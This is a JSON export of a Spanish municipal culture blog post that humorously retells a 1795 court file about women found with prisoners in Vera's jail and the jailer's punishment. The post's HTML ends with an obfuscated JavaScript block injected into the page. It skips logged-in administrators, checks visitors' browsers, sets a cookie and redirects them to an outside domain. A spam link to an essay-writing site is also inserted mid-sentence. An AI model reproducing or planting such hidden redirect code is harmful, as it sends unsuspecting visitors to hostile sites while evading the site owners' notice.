{"id":2220,"date":"2016-10-14T12:28:11","date_gmt":"2016-10-14T12:28:11","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2220"},"modified":"2018-01-15T11:36:09","modified_gmt":"2018-01-15T11:36:09","slug":"la-moral-y-la-ley-en-la-real-carcel-de-vera-1795","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/10\/14\/la-moral-y-la-ley-en-la-real-carcel-de-vera-1795\/","title":{"rendered":"LA MORAL Y LA LEY EN LA REAL C\u00c1RCEL DE VERA. 1795"},"content":{"rendered":"<p>Pensamientos en torno a un documento del Archivo Municipal de Vera sobre la moralidad y la Real C\u00e1rcel de Vera.<\/p>\n<p><!--more--><\/p>\n<p>17 de febrero a las 12:40<\/p>\n<p>Hace unos d\u00edas, Manuel Caparr\u00f3s, archivero municipal, me facilit\u00f3 un expediente judicial [267-3], que me result\u00f3 curioso y, pasado el tiempo, con un toque de humor, que hizo que, a lo largo de la lectura de los 82 folios que forman parte de ese expediente, me sonriera, a veces, con las respuestas que daban al fiscal, adem\u00e1s de imaginarme <a href=\"https:\/\/essaysbuy.com\/\">essaysbuy.com<\/a> la grotesca situaci\u00f3n que se vivi\u00f3 en Vera, aquella noche del 22 de marzo de 1.795.<br \/>\nEn las fotos podemos ver la portada del expediente, la primera p\u00e1gina del mismo y la firma del Alcalde Mayor, que impart\u00eda justicia, al final de todo el proceso.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-A.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-2221\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-A-225x300.jpg\" alt=\"1795 A\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-A-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-A.jpg 720w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p>Ocurri\u00f3, que a las nueve de la noche de aquel d\u00eda, le lleg\u00f3 a D. Juan de Llobes y Rapela, Alcalde Mayor, la noticia de que en la c\u00e1rcel de Vera , dos presos vecinos de Cuevas, hab\u00edan pasado la noche con dos mujeres de la misma vecindad, con el consentimiento de Gin\u00e9s L\u00f3pez Carretero, alcaide de la prisi\u00f3n, seg\u00fan se escribe en el expediente con \u00abmenosprecio de la conciencia y poco acatamiento de la Real Jurisdicci\u00f3n\u00bb.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/c\u00e1rcel.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2224\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/c\u00e1rcel-300x201.jpg\" alt=\"c\u00e1rcel\" width=\"300\" height=\"201\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/c\u00e1rcel-300x201.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/c\u00e1rcel-768x514.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/c\u00e1rcel-1024x685.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/c\u00e1rcel.jpg 1237w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nNuestro Alcalde Mayor, manda a los alguaciles a comprobar lo ocurrido y, poco despu\u00e9s, a las 10 de la noche, se persona \u00e9l acompa\u00f1ado del escribano Juan Belmonte y del \u00abjusticia de la audiencia\u00bb Pedro Galindo, para dejar constancia de los hechos. Cuando llegan, el Alcalde Mayor ordena al carcelero, que abra la celda que ocupaban los prisioneros y, seg\u00fan se describe en ese expediente, la celda estaba totalmente a oscuras, y con la luz de las antorchas que llevaban, sorprenden a los presos acostados con las mujeres, todos desnudos, aunque unas l\u00edneas m\u00e1s abajo, dice que una de ellas estaba \u00aben pa\u00f1os menores\u00bb y encorvada. No quiero ni imagin\u00e1rmelo.<br \/>\nComienzan a tomar declaraci\u00f3n a las mujeres. Una de ellas dice llamarse Juana Rodr\u00edguez y ser vecina de Cuevas, de estado viuda. De la otra no consta el nombre, se limitan a decir, que su nombre figura en informe aparte. \u00bfQuien ser\u00eda la mujer?, a lo largo del proceso no se la menciona y siempre que hablan de ella lo hacen en los t\u00e9rminos \u00abLA OTRA MUJER, CUYO NOMBRE FIGURA EN INFORMA APARTE\u00bb, \u00bfSer\u00eda alguien importante o al menos muy conocida?, bueno, fuera quien fuera, el caso es que tambi\u00e9n estaba all\u00ed.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1895-B.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2223\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1895-B-225x300.jpg\" alt=\"1895 B\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1895-B-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1895-B.jpg 720w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><br \/>\nEste par de sujetos, estaban presos acusados de \u00abvagos y mal entretenidos\u00bb, tal vez, por eso estas mujeres fueron a visitarlos, para entretenerlos mejor y as\u00ed exculparlos de parte de la acusaci\u00f3n.<br \/>\nComienza el interrogatorio, que no tiene desperdicio, y le preguntan a Juana, que c\u00f3mo se atrevi\u00f3 a cometer falta de tanta gravedad, \u00abdurmiendo con ellos y cometiendo ofensas a Dios, con menosprecio de su conciencia\u00bb. La buena de Juana, ni corta ni perezosa, contesta que con motivo de ver a su cu\u00f1ado, primo y compadre abandonado y que su mujer no le tra\u00eda de cenar, se condoli\u00f3 de \u00e9l y por eso vino a favorecerlo en esa ocasi\u00f3n, digo yo, que adem\u00e1s le dar\u00eda de cenar, supongo.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-C.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2222\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-C-225x300.jpg\" alt=\"1795 C\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-C-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/07\/1795-C.jpg 720w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><br \/>\nLuego preguntaron al alcaide de la prisi\u00f3n, que en aquel tiempo ten\u00eda 36 a\u00f1os, y por tanto estaba en edad de merecer, que por qu\u00e9 hab\u00eda dejado entrar a las dos mujeres, \u00abyendo contra la moral y la ley, cometiendo tan grave falta\u00bb. El hombre tampoco fue muy convincente, aleg\u00f3 que lo persuadieron con plegarias y ruegos y que al llevar un ni\u00f1o peque\u00f1o, las hizo mujeres de los presos. Yo creo que ni el Alcalde mayor ni el escribano ni el justicia de la audiencia se creyeron su excusa, m\u00e1s bien pensar\u00edan que tambi\u00e9n le hab\u00edan dado de cenar a \u00e9l.<br \/>\nA la otra mujer (la que no se nombra en el expediente), le preguntan que por qu\u00e9 estaba all\u00ed y que si conoc\u00eda a los presos, ella tampoco se achanta y, me imagino que con el desparpajo que dan ese tipo de experiencias en la vida, les responde que no los conoc\u00eda y que ella s\u00f3lo acompa\u00f1aba a Juana, que hab\u00eda ido a Vera a vender una piezas de tela y unos hilos.<\/p>\n<p>Pensar\u00eda la buena mujer, \u00abya que estamos aqu\u00ed&#8230;\u00bb<br \/>\nAs\u00ed contin\u00faa el interrogatorio con preguntas l\u00f3gicas y respuestas incre\u00edbles.<br \/>\nBueno, vamos a terminar, porque si no acabar\u00e9 contando los 82 folios.<\/p>\n<p>La sentencia que se dict\u00f3 , a petici\u00f3n del \u00abfiscal de oficio\u00bb, fue que por la acusaci\u00f3n de prostituci\u00f3n, excesos e incontinencia contra la moral y el orden, se condena a las mujeres a 6 meses de destierro a una distancia de 6 leguas y a Gin\u00e9s L\u00f3pez Carretero, alcaide de la prisi\u00f3n, a la privaci\u00f3n de su ejercicio y a no poder ejercer cargos p\u00fablicos durante 8 a\u00f1os, ademas de una multa de 19 ducados a cada uno de ellos, m\u00e1s el pago de las costas del proceso o al embargo de sus bienes hasta cubrir esos importes.<br \/>\nDe los presos no se dice nada, supongo que considerar\u00edan suficiente que permanecieran en prisi\u00f3n, adem\u00e1s de quedarse sin cena hasta que salieran de la c\u00e1rcel.<\/p>\n<table border=\"1\" cellspacing=\"0\" bgcolor=\"#c0c0c0\">\n<caption><b>Fuentes Documentales Estudio Tierra de Vera Judiciales<\/b><\/caption>\n<thead>\n<tr>\n<th bgcolor=\"#c0c0c0\"><span style=\"font-size: 8pt;color: #000000;font-family: Arial\">ASUNTO<\/span><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr valign=\"TOP\">\n<td><b><span style=\"font-size: 8pt;color: #000000;font-family: Arial\">1795, marzo, 22 &#8211; septiembre, 3. Vera. Juan Jos\u00e9 de Llobes y Rapela, alcalde mayor, contra Juana Rodr\u00edguez Pi\u00f1ar y otra mujer de nombre reservado, vecinas de Cuevas, por prostituci\u00f3n en la c\u00e1rcel de Vera, y contra Gin\u00e9s L\u00f3pez Carretero, alcaide de la c\u00e1rcel por permitirlo. 72 f. A.M.V. 267-3<\/span><\/b><\/td>\n<\/tr>\n<\/tbody>\n<tfoot><\/tfoot>\n<\/table>\n<h5 class=\"western\" align=\"right\"><span style=\"color: #000000\">17-02-2016<\/span><\/h5>\n<h5 class=\"western\" align=\"right\"><span style=\"color: #000000\">Gabriel Flores Garrido<\/span><\/h5>\n<h5 class=\"western\" align=\"right\"><span style=\"color: #000000\">Facebook (No eres de Vera si&#8230;)<\/span><\/h5>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pensamientos en torno a un documento del Archivo Municipal de Vera sobre la moralidad y la Real C\u00e1rcel de Vera.<\/p>\n","protected":false},"author":7,"featured_media":2225,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[168,100,169,170,269],"class_list":["post-2220","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones","tag-carcel","tag-gabriel-flores-garrido","tag-moral","tag-prostitucion","tag-s-xviii"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2220","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2220"}],"version-history":[{"count":6,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2220\/revisions"}],"predecessor-version":[{"id":3190,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2220\/revisions\/3190"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2225"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2220"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}